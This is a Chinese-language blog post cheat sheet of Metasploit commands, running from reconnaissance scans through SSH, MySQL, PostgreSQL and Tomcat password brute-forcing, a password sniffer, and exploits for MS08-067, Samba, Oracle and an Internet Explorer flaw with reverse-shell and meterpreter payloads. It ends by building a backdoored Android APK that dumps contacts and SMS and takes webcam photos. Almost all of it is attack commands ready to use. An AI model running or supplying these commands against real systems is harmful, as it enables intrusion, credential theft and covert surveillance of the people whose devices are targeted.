常用的Metasploit模块

發表於 2016-02-03   |   分類於 信息安全   |  

msf信息搜集模块

搜索网站中的E-mail地址
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com
run

主机发现模块
发现网段中存活的主机
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.80.0/24
set THREADS 50
run

端口扫描
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.80.1
set THREADS 20
run

服务扫描
search name:_version

telnet服务扫描
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

ssh服务扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

oracle数据库服务扫描
use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

口令猜测与嗅探

ssh服务口令猜测
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.80.134
set USERNAME root
set PASS_FILE /root/pass.txt
set THREADS 50
run

口令嗅探
use auxiliary/sniffer/psnuffle
run

漏洞利用

mysql攻击

search mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

postgresql攻击

search postgresql
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_fiel /root/pass.txt
exploit

tomcat 攻击
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.1
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit

telnet 攻击
use auxiliary/scanner/telnet/telnet_version
set 192.168.1.1
exploit

samba攻击

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.1 /192.168.1.0/24
set THREADS 200
exploit

search ms08_067
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
show options
show targets
set RHOST 192.168.80.130
set LPORT 5555
set LHOST 192.168.80.131
set target 7
exploit

SAMBA渗透攻击

search chain_reply
use exploit/linux/samba/chain_reply
show targets
set targets 0
set RHOST 192.168.80.1
set RPORT 139
set LHOST 192.168.80.130
set LPORT 5544
exploit

ORACLe渗透攻击
use exploit/windows/oracle/tns_auth_sesskey
show options
set RHOST 192.168.80.133
set RPORT 1521
set LHOST 192.168.80.130
set LPORT 4444
set target 1
exploit

浏览器渗透攻击实例
ms11-050
use windows/browser/ms11_050_mshtml_cobjectelemnt
info
set payload windows/meterpreter/reverse_http
set URIPATH ms11050
set LHOST 192.168.80.131
set LPORT 8888
Exploit

入侵安卓手机

msfpayload android/meterpreter/reverse_tcp LHOST=172.16.1.109 LPORT=4444 R > /root/Desktop/apk.apk
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.109
exploit
dump_contacts –这个是导出电话dump_sms –这个是导出信息
Webcam_list可以看到有几个摄像头
-i 1 是选择后摄像头
webcam_snap 是拍照 ,看到我电脑了
webcam_stream 开启摄像头

#Kali #Metasploit
web前端挖掘与渗透工具集合
Linux里如何查找文件内容